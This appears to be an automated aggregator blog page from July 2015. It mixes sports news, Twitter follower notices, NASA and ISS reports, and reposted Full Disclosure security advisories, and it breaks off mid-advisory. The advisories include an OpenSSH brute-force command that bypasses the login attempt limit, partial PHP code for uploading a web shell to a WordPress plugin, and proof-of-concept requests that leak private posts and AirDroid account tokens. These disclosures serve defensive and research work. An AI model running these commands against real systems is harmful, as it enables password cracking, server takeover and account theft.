Saturday, July 18, 2015

Orioles Highlight: Chris Tillman allows leadoff single, no other hits in 8 IP, Manny Machado 20th HR in win over Tigers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Jamaica beats Haiti 1-0, will play US in Gold Cup semifinal

BALTIMORE (AP) Houston Dynamo forward Giles Barnes scored in the seventh minute, and Jamaica beat Haiti 1-0 Saturday night to reach its first CONCACAF Gold Cup semifinal since 1998.

from FOX Sports Digital http://ift.tt/1Lvn2a1
via IFTTT

I have a new follower on Twitter

spanish words
learn new spanish words of the day
Phoenix

Following: 1438 - Followers: 1258

July 18, 2015 at 08:48PM via Twitter http://twitter.com/spaniishhh

Anonymous on Twitter: "SHOT THE WRONG MAN??? http://ift.tt/1HBK3p8;

Anonymous added,. The Cryptosphere @_Cryptosphere. 'Guy Fawkes' #Anonymous Masked Man Dead After RCMP Shooting now UPDATED: shot ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/622253436382351361&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFZtQ2w8j05ghJnQK34_LX05WXC0w
via IFTTT

Dempsey's 3 goals lift US over Cuba 6-0, into Gold Cup semis

BALTIMORE (AP) Clint Dempsey scored on a fourth-minute header, added a pair of second-half goals for his first international hat trick, and the United States routed Cuba 6-0 on Saturday to reach its eighth straight CONCACAF Gold Cup semifinal.

from FOX Sports Digital http://ift.tt/1DnITK0
via IFTTT

Bartomeu elected for 2nd term as Barcelona president

BARCELONA, Spain (AP) Josep Bartomeu was re-elected president of Spanish football club Barcelona on Saturday, capitalizing on the team's success last season to defeat three challengers despite being a suspect in a fraud case and a FIFA ban on signing new players.

from FOX Sports Digital http://ift.tt/1MAH55s
via IFTTT

[FD] Information Exposure Vulnerability in WordPress Mobile Pack Wordpress Plugin v2.1.2 and below

# Title: Information Exposure Vulnerability in WordPress Mobile Pack Wordpress Plugin v2.1.2 and below # Submitter: Nitin Venkatesh # Product: WordPress Mobile Pack Wordpress Plugin # Product URL: http://ift.tt/1GGXPIr # Vulnerability Type: Information Exposure[CWE-200] # Affected Versions: v2.1.2 and below. Installed v2.1.3 before June 3, 2015 also affected. # Tested versions: v2.1.2, v2.1.3 (prior to June 3, 2015) # Fixed Version: v2.1.3 # Link to code diff: http://ift.tt/1TJnLar # Changelog: http://ift.tt/1VfhchG # CVE Status: None/Unassigned/Fresh ## Product Information: The NEW WordPress Mobile Pack allows you to 'package' your existing content into a cross-platform mobile web application. ## Vulnerability Description: Information Disclosure - Returns the contents of a privately published post in JSON ## Proof of Concept: http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78 ### Sample HTTP Request GET /wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive ### Sample HTTP Response HTTP/1.1 200 OK Date: Wed, 03 Jun 2015 00:02:46 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.9 Content-Length: 462 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8 exportarticle({"article":{"id":78,"title":"Private Post!!!","timestamp":1432955820,"author":"admin","date":"Sat, May 30, 2015, 03:17","link":"http:\/\/localhost\/?p=78","image":"","description":"

Should be invisible<\/p>\n","content":"

Should be invisible<\/p>\n","comment_status":"open","no_comments":0,"show_avatars":true,"require_name_email":true,"category_id":1,"category_name":"Uncategorized","related_posts":"","related_web_posts":"","zemanta":false}}) ## Solution: Upgrade to v2.1.3. Users who installed v2.1.3 before June 3, 2015 should re-download and re-install the package. ## Disclosure Timeline: 2015-06-01 - Discovered. Contacted developer on support forums. 2015-06-03 - Mailed report to developer. 2015-06-03 - Updated v2.1.3 released. 2015-07-18 - Publishing disclosure on FD mailing list. ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] weblogin software cross site request

: Dork: intitle:weblogin intext:"This page will redirect you to:" A single site runs this 'WebLogin'. : Product:WebLogin What is the vendor URL? Or there is none, because this is a site-specific issue for lanl.gov. Worse, it has pretty aggressive filtering and will not render script tags, HTML tags, and requires the http:// element it seems. So this is a site specific issue, with no real value or merit, and doesn't apply to anyone else in the world? : Rootktit Pentester. Really?

Source: Gmail -> IFTTT-> Blogger

Re: [FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

On 17/07/15 10:04, king cope wrote: > OpenSSH has a default value of six authentication tries before it will > close the connection (the ssh client allows only three password > entries per default). > > With this vulnerability an attacker is able to request as many > password prompts limited by the “login graced time” setting, that is > set to two minutes by default. > > Especially FreeBSD systems are affected by the vulnerability because > they have keyboard-interactive authentication enabled by default. > > A simple way to exploit the bug is to execute this command: > > ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x > 10000'` targethost > > This will effectively allow up to 10000 password entries limited by > the login grace time setting. > > The crucial part is that if the attacker requests 10000 > keyboard-interactive devices openssh will gracefully execute the > request and will be inside a loop to accept passwords until the > specified devices are exceeded. > > Here is a patch for openssh-6.9p1 that will allow to use a wordlist > and any passwords piped to the ssh process to be used in order to > crack passwords remotely. > >

Source: Gmail -> IFTTT-> Blogger

Pele has back surgery, leaving Sao Paulo hospital next week

SAO PAULO (AP) Pele has successfully undergone back surgery for nerve root decompression and his postoperative recovery is satisfactory, the Albert Einstein Hospital in Sao Paulo said on Saturday.

from FOX Sports Digital http://ift.tt/1DnyHRG
via IFTTT

Banned FIFA official pleads not guilty to racketeering

NEW YORK (AP) A former top FIFA official pleaded not guilty Saturday to racketeering and bribery charges in a corruption case aimed at soccer's governing body that has sent shock waves through the sport.

from FOX Sports Digital http://ift.tt/1MAyqjH
via IFTTT

Dempsey, Johannsson start up top for US against Cuba

BALTIMORE (AP) U.S. coach Jurgen Klinsmann has made three changes to his starting lineup for the Gold Cup quarterfinal against Cuba, starting Omar Gonzalez for suspended defender John Brooks, and Clint Dempsey and Aron Johannsson in place of Chris Wondolowski and Alfredo Morales.

from FOX Sports Digital http://ift.tt/1J7Luhm
via IFTTT

Brazil soccer great Pele is hospitalized

SAO PAULO (AP) A Brazilian hospital says Pele is hospitalized in Sao Paulo.

from FOX Sports Digital http://ift.tt/1gGO7f0
via IFTTT

Message to @Beneful, @Purina, @Nestle :: We are #Anonymous

Message to @Beneful, @Purina, @Nestle :: We are #Anonymous.

from Google Alert - anonymous http://ift.tt/1DnlGrn
via IFTTT

I have a new follower on Twitter

About My World
Your smile makes my world shine like a star and every thought of you makes my problems disappear.

Following: 2707 - Followers: 2533

July 18, 2015 at 12:14PM via Twitter http://twitter.com/Aboutmyworldd

Hertha Berlin signs Czech midfielder Darida from Freiburg

BERLIN (AP) Hertha Berlin signed Czech Republic midfielder Vladimir Darida from relegated Bundesliga side Freiburg on Saturday.

from FOX Sports Digital http://ift.tt/1LhQxxF
via IFTTT

FIFA leaders return to Zurich, ready to pick election date

GENEVA (AP) FIFA leaders this weekend return to the scene of a criminal investigation which sent football's governing body into crisis eight weeks ago.

from FOX Sports Digital http://ift.tt/1RGdRJ6
via IFTTT

WhatsApp, Viber and Skype Internet Calls may No Longer be FREE in India

We all are aware of Net Neutrality and the recent controversies over it in India. Net Neutrality is simply the Internet Freedom — Free, Fast and Open Internet for all. India has been battling for Net Neutrality since zero-rating services such as Facebook’s Internet.org and Airtel Zero were announced. The Department of Telecommunications (DoT) has now released a much-awaited report [

from The Hacker News http://ift.tt/1Kd3Eji
via IFTTT

Like It Or Not... You Can't Disable Windows 10 Automatic Updates

Windows 10 is all set to launch on July 29 and will also be available on USB drives for purchase in retail channels. So, if you are planning to install Windows 10 Home, one thing you must keep in your mind – You wish or not, the software updates for Microsoft’s new operating system will be mandatory. Microsoft is planning to make a significant change to its software update policy by "

from The Hacker News http://ift.tt/1DmGAqr
via IFTTT

Nasri goal gives Manchester City 1-0 win over Melbourne City

GOLD COAST, Australia (AP) Midfielder Samir Nasri's 86th-minute goal Saturday gave Manchester City a 1-0 win over its co-owned A-League side Melbourne City on Saturday.

from FOX Sports Digital http://ift.tt/1VdALa7
via IFTTT

Anonymous confessions about hockey, from the Whisper App

Anonymous confessions about hockey, from the Whisper App. BarDown Staff (@BarDown) Jul. 17, 2015 9:42 PM. Looking to get some things off your ...

from Google Alert - anonymous http://ift.tt/1RFTFqH
via IFTTT

Brazil's soccer chief decides not to travel to Switzerland

SAO PAULO (AP) The president of the Brazilian football confederation will not attend FIFA's upcoming executive committee meeting in Switzerland, where his predecessor was arrested on corruption charges less than two months ago.

from FOX Sports Digital http://ift.tt/1GrUMP1
via IFTTT

Charon

Icy world Charon is 1,200 kilometers across. That makes Pluto's largest moon only about 1/10th the size of planet Earth but a whopping 1/2 the diameter of Pluto itself. Charon is seen in unprecedented detail in this image from New Horizons. The image was captured late July 13 during the spacecraft's flight through the Plutonian system from a range of less than 500,000 kilometers. For reference, the distance separating Earth and Moon is less than 400,000 kilometers. Charonian terrain, described as surprising, youthful, and varied, includes a 1,000 kilometer swath of cliffs and troughs stretching below center, a 7 to 9 kilometer deep canyon cutting the curve of the upper right edge, and an enigmatic dark north polar region unofficially dubbed Mordor. via NASA http://ift.tt/1Gps8Op

Friday, July 17, 2015

Food Addicts in Recovery Anonymous Meeting

If you're struggling with food, come to a Saturday morning Food Addicts in Recovery Anonymous 12-step meeting. FA is for anyone who suffers from ...

from Google Alert - anonymous http://ift.tt/1MgnkDn
via IFTTT

Don't Wanna Die Anonymous

Aired on 07 / 16 / 2015. Watching a sold out Afghan Whigs reunion show leads Johnny to try and get his old band back together. An FX Original Series ...

from Google Alert - anonymous http://ift.tt/1HAcXGh
via IFTTT

Orioles Video: Chris Davis robbed by another leaping catch at wall, Ubaldo Jimenez allows 7 R in loss to Tigers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

US forward Sydney Leroux needs ankle surgery

CHICAGO (AP) U.S. women's national team forward Sydney Leroux will have surgery on her right ankle and will be sidelined for at much as three months.

from FOX Sports Digital http://ift.tt/1SsPwlc
via IFTTT

US forward Morgan has knee surgery

PORTLAND, Ore. (AP) U.S. women's national team forward Alex Morgan had surgery on her right knee and is expected to be out for three to four weeks.

from FOX Sports Digital http://ift.tt/1I9vXwS
via IFTTT

Cuba says 4 players absent for Gold Cup quarterfinal vs US

BALTIMORE (AP) When it comes to Cuba's soccer team, you can't even tell the players with a scorecard.

from FOX Sports Digital http://ift.tt/1I9xPro
via IFTTT

President of Bolivia's soccer federation arrested

LA PAZ, Bolivia (AP) Police in Bolivia have arrested the president of the nation's soccer federation for alleged corruption.

from FOX Sports Digital http://ift.tt/1HA1HcS
via IFTTT

Judge in California dismisses soccer concussion lawsuit

SAN FRANCISCO (AP) A federal judge in California has dismissed a lawsuit against US Soccer and other soccer organizations that said they had not done enough to reduce the risk of injury from concussions and repetitive heading of balls.

from FOX Sports Digital http://ift.tt/1VbYuaw
via IFTTT

[FD] weblogin software cross site request

Hi, People i discover a cross site request in this Dork: intitle:weblogin intext:"This page will redirect you to:" This cross site request is exploit like this example: http://target/Login:%20Weblogin%20%20This%20page%20will%20redirect%20you%20to

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

Benjamin, What is an androidios device account? Is that a typo? And does the default "mobile/alpine" user account suffice? It isn't clear to me whether the iOS device needs to be jailbroken for this exploit to work. The

Source: Gmail -> IFTTT-> Blogger

[FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

OpenSSH has a default value of six authentication tries before it will close the connection (the ssh client allows only three password entries per default). With this vulnerability an attacker is able to request as many password prompts limited by the “login graced time” setting, that is set to two minutes by default. Especially FreeBSD systems are affected by the vulnerability because they have keyboard-interactive authentication enabled by default. A simple way to exploit the bug is to execute this command: ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost This will effectively allow up to 10000 password entries limited by the login grace time setting. The crucial part is that if the attacker requests 10000 keyboard-interactive devices openssh will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded. Here is a patch for openssh-6.9p1 that will allow to use a wordlist and any passwords piped to the ssh process to be used in order to crack passwords remotely.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-09 Download Site: http://ift.tt/1fNXjxW Vendor: CadreWorks Pty Ltd Vendor Notified: 2015-07-09 fixed in v1.110 Vendor Contact: Contact Page via WP site Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server: 2 $message_id = $_REQUEST["message_id"]; 3 $upload_dir = $_REQUEST["upload_dir"]; . . 8 $fileName = $_FILES["file"]["name"]; 9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); Exploitation requires the attacker to guess a writeable location in the http server root. CVEID: OSVDB: Exploit Code: • 'shell.php','file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "

"; • echo $result; • echo "

"; • ?> • Advisory: http://ift.tt/1I9jICg

Source: Gmail -> IFTTT-> Blogger

[FD] 1503A - Chrome - ui::AXTree::Unserialize use-after-free

T*L;DR* After 60 day deadline has passed, I am releasing details on an unfixed use-after-free vulnerability in Chrome's accessibility features, which are disabled by default. The issue does not look exploitable. *More details* http://ift.tt/1HzOH6Y *Chromium bug*http://ift.tt/1I9jICa Cheers, SkyLined

Source: Gmail -> IFTTT-> Blogger

Frimpong sent off in Russia after apparent racist abuse

MOSCOW (AP) Former Arsenal player Emmanuel Frimpong faces a multi-game ban after he was sent off in Russia for his response to alleged racist abuse.

from FOX Sports Digital http://ift.tt/1CHecET
via IFTTT

Delph makes U-turn, leaves Aston Villa for Man City

MANCHESTER, England (AP) England midfielder Fabian Delph has signed a five-year contract with Manchester City, just days after telling Aston Villa fans he was staying with the Premier League club.

from FOX Sports Digital http://ift.tt/1J5HyOd
via IFTTT

Prosecutor confirms FIFA official in US to face charges

NEW YORK (AP) Prosecutors have confirmed that a top FIFA official has arrived in the United States to face racketeering and bribery charges.

from FOX Sports Digital http://ift.tt/1VbkFxH
via IFTTT

Hacker Earns 1.25 Million Free Frequent Flyer Miles On United Airlines

What if you get 1 Million Frequent Flyer Miles for Free? Yes, 1 Million Air Miles… …I think that would be enough for several first-class trips to Europe or up to 20 round-trips in the United States. Two Computer Hackers have earned more than 1 Million frequent-flyer miles each from United Airlines for finding multiple security vulnerabilities in the Airline's website. Back in May

from The Hacker News http://ift.tt/1HDK8qb
via IFTTT

I have a new follower on Twitter

Jewish Quotes
Funny Jewish sayings have been around a long time. We are going to look at some of these sayings, some funny quotes ..

Following: 1382 - Followers: 1203

July 17, 2015 at 11:30AM via Twitter http://twitter.com/JewishQuotess

Spain government honours football greats Casillas, Xavi

MADRID (AP) The Spanish government has honored Iker Casillas and Xavi Hernandez for their long and successful careers at Real Madrid and Barcelona that ended this summer.

from FOX Sports Digital http://ift.tt/1RDHTx6
via IFTTT

[FD] AirDroid ID - Client Side JSONP Callback Vulnerability

Document Title: =============== AirDroid ID - Client Side JSONP Callback Vulnerability References (Source): ==================== http://ift.tt/1NY5zqz Release Date: ============= 2015-07-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1544 Common Vulnerability Scoring System: ==================================== 5.6 Product & Service Introduction: =============================== Calls, SMS, and the app notifications you allowed, mirrored to the large computer screen you are focusing on. Type with full physical keyboard and control with mouse. Transfer things faster without looking for a cable. Better equipments, better life. AirMirror, a brand new way of interacting between PC/Mac and your Android. Your Android, right on your computer, right now. With the new Desktop client, your Android, Windows and Mac work like one. (Copy of the Vendor Homepage: http://ift.tt/1bNgRQx ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a client-side vulnerability in the official AirDroid ID login online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-07-06: Researcher Notification & Coordination (Hadji Samir) 2015-07-07: Vendor Notification (Android Security Team) 2015-07-09: Vendor Response/Feedback (Android Security Team) 2015-07-10: Vendor Fix/Patch (Android Developer Team) 2015-07-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Sand Studio Product: Airdroid - Online Service (Web-Application) 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side jsonp callback vulnerability has been discovered in the official Airdroid online-service web-application. The vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise session data. The vulnerability is located in the callback parameter value of the vulnerable signIn.html file. The vulnerability allows remote attackers to inject script code by client-side manipulated GET method requests. The vulnerability allows remote attacker to call an callback JSONP for get the information about the user The vulnerability allows remote attackers to callback script code by client-side manipulated GET method requests. Thus can result in an id account or device compromise. The attack vector of the vulnerability is located on the client-side and the request method to inject/execute is GET. The service replies via jsonp by a callback with wrong cleanup which results in the unexpected behaviour. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the cross site scripting web vulnerability requires no privilege web application user account and low user interaction (click). Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Module(s): [+] Login [Web] (./p14/user/) Vulnerable File(s): [+] signIn.html Vulnerable Parameter(s): [+] callback Proof of Concept (PoC): ======================= The client-side callback vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: *.html

JSONP Call

Vulnerable Source: JSONP Call samir({"code":"1","result":{"id":"9731220","nickname":"Hadji+Samir","mail":"info.dimanet@gmail.com","create_date":"2015-07-06 06:18:40","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"0","avatar_url":"","last_update_avatar":"2015-07-06 06:18:40","country":"DZ","isPremium":-1,"is_recurring":0,"has_device":"1","device":[{"id":"10257826","name":"htc HTC T528w","deviceId":"3cacf266733309329510a4d2477ace37","channelToken":"2785903c941c8450ebf816b47dab1164","logicKey":"6227d20a5103046b92d118d5db9e2e67","manu":"htc","model":"HTC T528w","model_pic":"http:\/\/img.airdroid.com\/devices\/default","osVersion":"4.1.1","sdkApiLevel":"16","netOpts":{"ip":"192.168.1.4","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true","file_port":8765},"appVer":"20142","gcmId":"","is_default":"0","imsi":"0","create_date":"2015-07-06 06:20:18","account_id":"9731220","push_token":"20a2a64bd6cb1608cb2fc1c1bb1ed18b","support_plugin_vnc":0,"plugin_vnc_versions":0,"plugin_vnc_url":"","plugin_vnc_log":"","plugin_vnc_update_from_url":"false","phone_versions":0,"pc_versions":"","mac_versions":"","addon_package_name":""}],"app_last_modify":"1436177702","token":"","avatar":[],"push_ws_sub_url":"ws:\/\/54.227.249.159:443","push_tcp_sub_url":"54.227.249.159:80","push_pub_url":"http:\/\/push.airdroid.com","pc_push_token":"99eb3edebbbc30883679e563d0ed2d1f","web_push_token":"b585e6763f41df6c8fcf1961f38c6d74","fmp_push_token":"d15b2f78e335b68186bab0664c027520","account_type":2,"is_unlock":0,"max_file_size":31457280,"lan_trans_folder":0,"unlock_starttime":"","unlock_expired":"","server_timestamp":14362728935628},"msg":"success!"}) Reference(s): http://ift.tt/JCvqri http://ift.tt/1fPT8Sv Solution - Fix & Patch: ======================= Parse in the jsonp GET method request the vulnerable callback value to prevent client-side script code injection attacks. Restrict the callback input by a whitelist and disallow special chars on server-side or client-side GET method requests. Security Risk: ============== The security risk of the vulnerability in the android id login web-application is estimated as high. (CVSS 5.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 07/16/15

Late Notice Conjunction: The Flight Control Team was notified of a late notice, red conjunction early this morning with insufficient time to execute a Predetermined Debris Avoidance Maneuver (PDAM). The ISS crew was directed to take steps to safe the ISS and shelter in place in the Soyuz. The conjunction passed without incident and the crew re-ingressed the ISS. NanoRack Cubesat Deployer (NRCSD) Operations: The final 4 CubeSats were successfully deployed overnight. Kelly coordinated with ground teams who used the Japanese Experiment Module Remote Manipulator System (JEMRMS) to return the Multi-Purpose Experiment Platform (MPEP) containing the NRCSD #5 to the JEMAL slide table. The slide table was retracted, bringing the MPEP inside the JEMAL. Kelly will configure the JEMAL and monitor NRCSDs in preparation for A/L depress next week. Synchronized Position Hold, Engage, and Reorient Experimental Satellites (SPHERES) Slosh: Kelly reviewed on board training (OBT) materials on general SPHERES operation and procedures specific to SPHERES Slosh. He also stowed charged batteries and installed other batteries for charging for the upcoming SPHERES Slosh session scheduled for Friday. The SPHERES Slosh investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle’s contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets. Resistance to Radiation; Ras Labs-CASIS-ISS Project for Synthetic Muscle: Resistance to Radiation (Synthetic Muscle): Kelly took the 4th data set of historical photos documenting the synthetic muscle samples. Crew transferred photos to an SSC for photo downlink. The purpose of this experiment is to perform radiation testing of synthetic muscle to determine how radiation-hardened the proprietary materials are, for dual use on earth and in space, in extremely challenging environments. Both the preliminary radiation testing at PPPL/Princeton and the exposure to solar and cosmic radiation on the ISS determine radiation resistance of synthetic muscle and provide projections for radiation resistance in high radiation environments. Robotics made of synthetic muscle will be able to help humans on earth, mitigating and correcting dire situations in extremely challenging environments. Robots made of these materials will be able to assist humans in space and be able to survive deep space travel. A follow up external platform experiment is being planned. Sleep ISS-12: Kelly and Kornienko are performing their week of sleep logging. Within fifteen minutes of wakeup, the crew answers questions from the SleepLog application on the Station Support Computer (SSC). The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity, and collects subjective evaluations of sleep and alertness, to examine the effects of space flight and ambient light exposure on sleep during a year-long mission on the International Space Station (ISS). Node 3 Carbon Dioxide Removal Assembly (CDRA): Due to the crew shelter in place, N3 CDRA maintenance scheduled for today has been postponed to Monday 7/20/15. This includes the Air Selector Valve (ASV) 104 removal and replacement (R&R) and N3 CDRA leak check. The Lab CDRA is currently operating, and as of this writing ppCO2 is 1.6 mmHg. Today’s Planned Activities All activities were completed unless otherwise noted. CASKAD. Manual Mixing in Bioreactor / r/g 9277 JEMAL table extension 24-hour BP Monitoring (end) r/g 9337 SPHERES – Battery Charging Remote SM Laptop Testing (REMOTE RS LAPTOP) Preparation / r/g 9351 Installation of Voltage Converter ПН28-120 (Installation and connection of СБИ cable). / r/g 9328 SYN_MUSCL – Documentation Photo HABIT – Hardware activation Installation of Voltage Converter ПН28-120 (Mating Onboard Measurement System (СБИ) cable) / r/g 9328 step 6 EMRMS – Closing SAM Capture Mechanism to Softdock position Installation of Voltage Converter ПН28-120 (Installation and Connection of СБИ cable, Closeout Ops) / r/g 9328 Installation of Voltage Converter ПН28-120 / r/g 9328 SPHERES – Battery Charging PAO crew prep PAO Event with A Year Long Mission crew DAN. Experiment Ops / r/g 9083 [Deferred] DAN. Experiment Assistance / r/g 9083 [Deferred] JEM AL Slide Table Retraction JEMRMS RLT Laptop Deactivation Node 3 Carbon Dioxide Removal Assembly (CDRA) CO2 Selector Valve 104 R&R [Deferred] DAN. Experiment Ops / r/g 9083 [Deferred] DAN. Experiment Assistance / r/g 9083 [Deferred] SPHERES – Battery Charging MPEG-2 Video Downlink Test via KU-band prior to Soyuz 717 Docking to the ISS Filling (separation) of EDV (KOV) No.1137 Remote SM Laptop Testing (REMOTE RS LAPTOP) / r/g 9351 SPHERES – Experiment OBT SPHERES – Review Cleaning ВД1 and ВД2 Air Ducts in MRM2 SPHERES – Payload Conference SPHERES – Battery Charging VHF1 Comm Test via US Ground Sites (WAL, DRY, WHI) from the SM N3 CDRA leak check [Deferred] VEG-01 – Plant Photo SPHERES – Battery Charging Flight Director / ISS Crew Tagup Completed Task List Items ISS Safety Video Ground Activities All activities were completed unless otherwise noted. OASIS video JEMRMS activities Three-Day Look Ahead: Friday, 07/17: SPHERES Slosh run Saturday, 07/18: Crew off duty, housekeeping Sunday, 07/19: Crew off duty QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full Up Trace Contaminant Control System (TCCS) Node 3 Off

from ISS On-Orbit Status Report http://ift.tt/1I8xCEF
via IFTTT

Eleven Anonymous Turkish Muslims Baptized Orthodox Christians

Eleven Turkish citizens, among them a famous Turkish actor, were baptized in May 2015. The baptism was celebrated by the Metropolitan of Attica.

from Google Alert - anonymous http://ift.tt/1J4BBkt
via IFTTT

[FD] FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

Document Title: =============== FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability References (Source): ==================== http://ift.tt/1V2pBF6 098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0 Release Date: ============= 2015-07-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1451 Common Vulnerability Scoring System: ==================================== 3.4 Product & Service Introduction: =============================== Helping developers _add_ custom ecommerce without reinventing the wheel. (Copy of the Homepage: http://ift.tt/1RDAQo9 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-04-01: Vendor Notification (FoxyCart - Security Research Team) 2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team) 2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team) 2015-07-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== FoxyCart LLC Product: FoxyCart - Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application. The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function. The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding > Help Form` module. Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails. The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert or other script code tags. The service does not encode the input and has also no input restriction. After the code has been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a notification mail to the registered users inbox. The attacker is also able to include random email adresses to stream mails with malicious persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the manufacturer itself but in the attached comments value that becomes visible in the copy mail. The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. If the 